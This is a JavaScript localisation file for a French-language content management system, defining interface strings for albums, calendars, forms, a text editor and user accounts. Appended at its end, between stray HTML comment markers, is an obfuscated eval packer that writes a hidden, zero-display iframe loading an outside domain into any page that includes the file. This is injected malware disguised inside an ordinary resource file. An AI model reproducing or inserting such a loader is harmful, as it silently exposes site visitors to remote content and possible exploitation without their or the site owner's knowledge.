var thesaurus = new Array();thesaurus["adv_flashNeeded1"] = "Cette page utilise Flash. Nous vous recommandons d'installer ";
thesaurus["adv_flashNeeded2"] = "Macromedia Flash Player";
thesaurus["alb0"] = "Il faut choisir un fichier à envoyer au serveur.";
thesaurus["alb1"] = "Il faut définir le titre du fichier.";
thesaurus["alb2"] = "Le nettoyage de l'album supprime les images inutilisées.\\n\\nÊtes-vous sûr de vouloir nettoyer l'album ?";
thesaurus["alb3"] = "Le nettoyage de l'album supprime les documents inutilisés.\\n\\nÊtes-vous sûr de vouloir nettoyer l'album ?";
thesaurus["alb4"] = "Toutes les images sont utilisées.";
thesaurus["alb5"] = "Tous les documents sont utilisés.";
thesaurus["alb53"] = "Pas d'image";
thesaurus["alb54"] = "Pas de document";
thesaurus["alb56"] = "Fichier : %1";
thesaurus["alb57"] = "Titre : %1";
thesaurus["alb58"] = "Description : %1";
thesaurus["alb59"] = "Taille : %1 ko";
thesaurus["alb6"] = "%1 image(s) inutilisée(s).\\n\\nVoulez-vous le(s) supprimer ?";
thesaurus["alb7"] = "%1 document(s) inutilisé(s).\\n\\nVoulez-vous le(s) supprimer ?";
thesaurus["alb76"] = "%1 Ko";
thesaurus["alb8"] = "%1 image(s) supprimée(s)";
thesaurus["alb9"] = "%1 document(s) supprimé(s)";
thesaurus["cf_checked"] = "' doit être coché";
thesaurus["cf_day"] = "' doit être compris entre 1 et 31";
thesaurus["cf_emailField"] = "Le champ e-mail est obligatoire";
thesaurus["cf_empty"] = "' ne doit pas être vide";
thesaurus["cf_field"] = "Le champ '";
thesaurus["cf_field_day"] = "Le jour du champ '";
thesaurus["cf_field_month"] = "Le mois du champ '";
thesaurus["cf_field_year"] = "L'année du champ '";
thesaurus["cf_integer"] = "' doit être un nombre entier";
thesaurus["cf_month"] = "' doit être compris entre 1 et 12";
thesaurus["cf_no"] = "non";
thesaurus["cf_yes"] = "oui";
thesaurus["dynlib248"] = "Le formulaire de login ne fonctionne que dans le site diffusé.";
thesaurus["dynlibPassword"] = "vous n'avez pas saisi les mêmes valeurs dans les champs ";
thesaurus["evt192"] = "Voulez vous vraiment modifier le statut de cet événement ?";
thesaurus["jscalAou"] = "Août";
thesaurus["jscalAvr"] = "Avril";
thesaurus["jscalCLOSE"] = "Fermer";
thesaurus["jscalDec"] = "Décembre";
thesaurus["jscalDEF_DATE_FORMAT"] = "%d/%m/%Y";
thesaurus["jscalDim"] = "Dimanche";
thesaurus["jscalDRAG_TO_MOVE"] = "Déplacer";
thesaurus["jscalFev"] = "Février";
thesaurus["jscalGO_TODAY"] = "Atteindre date du jour";
thesaurus["jscalJan"] = "Janvier";
thesaurus["jscalJeu"] = "Jeudi";
thesaurus["jscalJul"] = "Juillet";
thesaurus["jscalJun"] = "Juin";
thesaurus["jscalLun"] = "Lundi";
thesaurus["jscalMai"] = "Mai";
thesaurus["jscalMar"] = "Mardi";
thesaurus["jscalMars"] = "Mars";
thesaurus["jscalMer"] = "Mercredi";
thesaurus["jscalMON_FIRST"] = "Commencer par lundi";
thesaurus["jscalNEXT_MONTH"] = "Mois suiv. (maintenir pour menu)";
thesaurus["jscalNEXT_YEAR"] = "Année suiv. (maintenir pour menu)";
thesaurus["jscalNov"] = "Novembre";
thesaurus["jscalOct"] = "Octobre";
thesaurus["jscalPART_TODAY"] = " (Aujourd'hui)";
thesaurus["jscalPREV_MONTH"] = "Mois préc. (maintenir pour menu)";
thesaurus["jscalPREV_YEAR"] = "Année préc. (maintenir pour menu)";
thesaurus["jscalSam"] = "Samedi";
thesaurus["jscalSEL_DATE"] = "Choisir une date";
thesaurus["jscalSep"] = "Septembre";
thesaurus["jscalSUN_FIRST"] = "Commencer par dimanche";
thesaurus["jscalTIME_PART"] = "(Maj-)Click ou déplacer pour changer la valeur";
thesaurus["jscalTODAY"] = "Aujourd'hui";
thesaurus["jscalTOGGLE"] = "Changer le premier jour de la semaine";
thesaurus["jscalTT_DATE_FORMAT"] = "%d/%m/%Y";
thesaurus["jscalVen"] = "Vendredi";
thesaurus["jscalWK"] = "sem";
thesaurus["msw_company"] = "de la société :";
thesaurus["msw_companyField"] = "Le champ Société est obligatoire";
thesaurus["msw_email"] = "Adresse Mel :";
thesaurus["msw_emailField"] = "Le champ adresse Mel est obligatoire";
thesaurus["msw_fax"] = "Télécopie :";
thesaurus["msw_message"] = "Vous fait parvenir le message suivant :";
thesaurus["msw_nameField"] = "Le champ Nom/Prénom est obligatoire";
thesaurus["msw_phone"] = "Téléphone :";
thesaurus["msw273"] = "Le formulaire de login ne fonctionne que dans le site diffusé.";
thesaurus["Non"] = "Non";
thesaurus["NP34"] = "Janvier";
thesaurus["NP35"] = "Février";
thesaurus["NP36"] = "Mars";
thesaurus["NP37"] = "Avril";
thesaurus["NP38"] = "Mai";
thesaurus["NP39"] = "Juin";
thesaurus["NP40"] = "Juillet";
thesaurus["NP41"] = "Août";
thesaurus["NP42"] = "Septembre";
thesaurus["NP43"] = "Octobre";
thesaurus["NP44"] = "Novembre";
thesaurus["NP45"] = "Décembre";
thesaurus["NP54"] = "Jan";
thesaurus["NP55"] = "Fév";
thesaurus["NP56"] = "Mar";
thesaurus["NP57"] = "Avr";
thesaurus["NP58"] = "Mai";
thesaurus["NP59"] = "Jun";
thesaurus["NP60"] = "Jul";
thesaurus["NP61"] = "Aou";
thesaurus["NP62"] = "Sep";
thesaurus["NP63"] = "Oct";
thesaurus["NP64"] = "Nov";
thesaurus["NP65"] = "Déc";
thesaurus["NP67"] = "D";
thesaurus["NP68"] = "L";
thesaurus["NP69"] = "M";
thesaurus["NP70"] = "M";
thesaurus["NP71"] = "J";
thesaurus["NP72"] = "V";
thesaurus["NP73"] = "S";
thesaurus["NP74"] = "Dim";
thesaurus["NP75"] = "Lun";
thesaurus["NP76"] = "Mar";
thesaurus["NP77"] = "Mer";
thesaurus["NP78"] = "Jeu";
thesaurus["NP80"] = "Sam";
thesaurus["NP81"] = "Dimanche";
thesaurus["NP82"] = "Lundi";
thesaurus["NP83"] = "Mardi";
thesaurus["NP84"] = "Mercredi";
thesaurus["NP85"] = "Jeudi";
thesaurus["NP86"] = "Vendredi";
thesaurus["NP87"] = "Samedi";
thesaurus["odf20"] = "Le formulaire ne peut être envoyé pour les raisons suivantes :";
thesaurus["odf21"] = "Souligné";
thesaurus["odf22"] = "Formaté";
thesaurus["odf23"] = "Aligner à gauche";
thesaurus["odf237"] = "Gras";
thesaurus["odf238"] = "Italique";
thesaurus["odf239"] = "Couleur du texte";
thesaurus["odf24"] = "Aligner à droite";
thesaurus["odf240"] = "[Style]";
thesaurus["odf241"] = "Paragraphe";
thesaurus["odf242"] = "Titre de page";
thesaurus["odf243"] = "Titre 1";
thesaurus["odf244"] = "Titre 2";
thesaurus["odf245"] = "Titre 3";
thesaurus["odf246"] = "Titre 4";
thesaurus["odf247"] = "Titre 5";
thesaurus["odf248"] = "Justifier";
thesaurus["odf249"] = "Diminuer le retrait";
thesaurus["odf25"] = "Liste ordonnée";
thesaurus["odf250"] = "Augmenter le retrait";
thesaurus["odf251"] = "Lier";
thesaurus["odf252"] = "Ajouter une image";
thesaurus["odf253"] = "Lien";
thesaurus["odf254"] = "Url";
thesaurus["odf255"] = "Info-bulle";
thesaurus["odf256"] = "Image";
thesaurus["odf257"] = "Text alternatif";
thesaurus["odf258"] = "Description longue";
thesaurus["odf259"] = "Largeur";
thesaurus["odf26"] = "Liste à puces";
thesaurus["odf260"] = "Hauteur";
thesaurus["odf261"] = "Bord";
thesaurus["odf262"] = "Alignement";
thesaurus["odf263"] = "Horizontal";
thesaurus["odf264"] = "Paragraphe";
thesaurus["odf265"] = "Gauche";
thesaurus["odf266"] = "Droite";
thesaurus["odf267"] = "Haut";
thesaurus["odf268"] = "Milieu";
thesaurus["odf269"] = "Bas";
thesaurus["odf27"] = "Agrandir la zone d'édition";
thesaurus["odf270"] = "Vertical";
thesaurus["odf271"] = "Cellule";
thesaurus["odf272"] = "Tableau";
thesaurus["odf275"] = "Liste à puces";
thesaurus["odf276"] = "Colonne";
thesaurus["odf278"] = "Veuillez saisir un entier";
thesaurus["odf279"] = "Insérer un tableau";
thesaurus["odf28"] = "Centré";
thesaurus["odf280"] = "Insérer une ligne au dessus";
thesaurus["odf281"] = "Insérer une ligne en dessous";
thesaurus["odf282"] = "Insérer une colonne à gauche";
thesaurus["odf283"] = "Insérer une colonne à droite";
thesaurus["odf284"] = "Supprimer la ligne";
thesaurus["odf285"] = "Supprimer la colonne";
thesaurus["odf286"] = "Supprimer le tableau";
thesaurus["odf287"] = "Fusionner à droite";
thesaurus["odf288"] = "Fusionner en dessous";
thesaurus["odf289"] = "Fractionner la cellule";
thesaurus["odf29"] = "Paragraphe formaté";
thesaurus["odf290"] = "Titre du tableau";
thesaurus["odf296"] = "Style";
thesaurus["odf297"] = "Normal";
thesaurus["odf298"] = "Pair/impair";
thesaurus["odf30"] = "Elément de liste";
thesaurus["odf301"] = "Faire couler le texte le long des images";
thesaurus["odf302"] = "Positionner à coté des illustrations";
thesaurus["odf31"] = "Cellule d'en-tête";
thesaurus["odfCheckPopupBlocker"] = "Impossible d'ouvrir la fenêtre. Vous devez désactiver votre bloqueur de fenêtres popup.";
thesaurus["Oui"] = "Oui";
thesaurus["sme_company"] = "de la société :";
thesaurus["sme_companyField"] = "Le champ Société est obligatoire";
thesaurus["sme_email"] = "E-mail :";
thesaurus["sme_emailField"] = "Le champ e-mail est obligatoire";
thesaurus["sme_emailField_invalid"] = "Le champ e-mail n'est pas valide";
thesaurus["sme_fax"] = "Télécopie :";
thesaurus["sme_message"] = "Vous fait parvenir le message suivant :";
thesaurus["sme_nameField"] = "Le champ Nom/Prénom est obligatoire";
thesaurus["sme_phone"] = "Téléphone :";
thesaurus["sme920"] = "Le formulaire de login ne fonctionne que dans le site diffusé.";
thesaurus["sme942"] = "La gestion du compte utilisateur ne fonctionne que dans le site diffusé.";
thesaurus["usr109"] = " groupes sélectionnés \n   ";
thesaurus["usr192"] = "Etes vous sûr de vouloir supprimer ce compte utilisateur ?";
thesaurus["usr193"] = "Etes vous sûr de vouloir supprimer ce groupe ?";
thesaurus["usr196"] = " compte sélectionné";
thesaurus["usr197"] = "groupe sélectionné";
thesaurus["usr247"] = "Aucun compte utilisateur sélectionné";
thesaurus["usr92"] = " comptes sélectionnés";
thesaurus["xrm261"] = "Toutes les statistiques de la période sélectionnée et des périodes antérieures seront supprimées, aussi il est recommandé de faire un export les statistiques de ces périodes au préalable\nEtes vous sur de vouloir purger ces périodes de votre base de données ?";
<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{}));
<!-- . -->